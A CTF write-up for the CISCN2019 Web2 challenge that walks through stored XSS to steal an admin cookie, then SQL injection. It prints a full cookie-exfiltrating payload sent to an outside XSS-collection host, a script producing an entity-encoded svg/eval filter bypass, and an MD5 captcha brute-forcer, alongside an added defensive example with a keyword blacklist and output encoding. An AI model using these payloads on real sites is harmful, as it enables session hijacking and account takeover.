[CISCN2019 East China North Regional] Web2 writeup notes
Most of my study time lately has gone into new things; I only browse FreeBuf and occasionally do a CTF challenge to keep the old direction warm.
After registering and logging in, the challenge lets you submit posts and feedback, and an XSS platform is provided.
There is an admin.php page that requires authentication to access.
Idea: put XSS code in a post, use the feedback form to make the admin visit it, capture the admin's cookie, and get into admin.php.
XSS platform source
(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if('1'==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
Change (new Image()).src to window.location.href, i.e. turn the image-creation function into a direct redirect.
Submitting the platform's payload directly gets filtered, so bypass it with HTML encoding: use an svg tag and have eval execute the code.
Script that HTML-encodes the code and generates the payload
words = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
encoded = ""
for c in words:
    # encode every character as a decimal numeric character reference (no trailing ';')
    encoded += "&#" + str(ord(c))
# the browser decodes the references inside <svg><script>, and eval runs the result
print("<svg><script>eval" + encoded + "</script>")
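The reason the svg wrapper matters is that character references are decoded in text inside foreign content such as `<svg><script>`, whereas a plain HTML `<script>` element is raw text and leaves `&#40` untouched. The block below is an added example, not code from the write-up or the challenge, and the keyword blacklist in it is an assumption (the challenge's real filter is not shown). It shows the defender's view of the same encoding trick: a keyword check on the raw submission is bypassed by the entity-encoded payload, decoding references before matching closes that specific gap, and encoding user content on output renders the markup inert regardless of how it was written.

```python
import html

# Assumed keyword blacklist standing in for the challenge's unknown filter.
BLOCKED_KEYWORDS = ("document.cookie", "location.href", "http://", "eval(")


def numeric_entity_encode(text: str) -> str:
    """Apply the same transformation as the write-up's generator:
    every character becomes a decimal numeric character reference, no ';'."""
    return "".join("&#" + str(ord(c)) for c in text)


def decode_entities(text: str) -> str:
    """Decode character references the way a browser would.
    html.unescape accepts '&#40' both with and without the trailing ';'."""
    return html.unescape(text)


def naive_filter_allows(submission: str) -> bool:
    """Blacklist check on the raw submission: this is what the bypass defeats."""
    lowered = submission.lower()
    return not any(keyword in lowered for keyword in BLOCKED_KEYWORDS)


def normalized_filter_allows(submission: str) -> bool:
    """Decode references first, then run the same blacklist.
    Still a blacklist, so it is a detection aid rather than the real fix."""
    return naive_filter_allows(decode_entities(submission))


def render_as_text(submission: str) -> str:
    """The actual mitigation: contextual output encoding. '<' and '&' are
    escaped, so the browser displays the payload instead of parsing it."""
    return html.escape(submission, quote=True)


def build_demo_payload() -> str:
    # Constructed stand-in for the write-up's script body; it only reads the URL.
    body = "(function(){return document.location.href})()"
    return "<svg><script>eval" + numeric_entity_encode(body) + "</script>"


if __name__ == "__main__":
    payload = build_demo_payload()
    print("raw blacklist allows payload:   ", naive_filter_allows(payload))
    print("normalized blacklist allows it: ", normalized_filter_allows(payload))
    print("rendered safely:", render_as_text(payload)[:60], "...")
```

Marking the session cookie HttpOnly is the complementary control for the cookie-theft step, since `document.cookie` then returns nothing for it; output encoding is what stops the injected markup from executing at all.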
After submitting, take the URL of the resulting page and submit it on the feedback page.
It requires a captcha whose MD5 hash must start with a fixed six-character prefix; brute-force it with a script.
import hashlib

for i in range(1, 10000000000):
    # md5 of the decimal string, compared on its first six hex characters
    md = hashlib.md5(str(i).encode("utf-8")).hexdigest()
    if md[0:6] == '6a1b6f':
        print(i)
        break  # the first match is enough
Once the submission succeeds you get the admin's cookie; send it along to access admin.php.
The simplest union-based injection then gets the flag.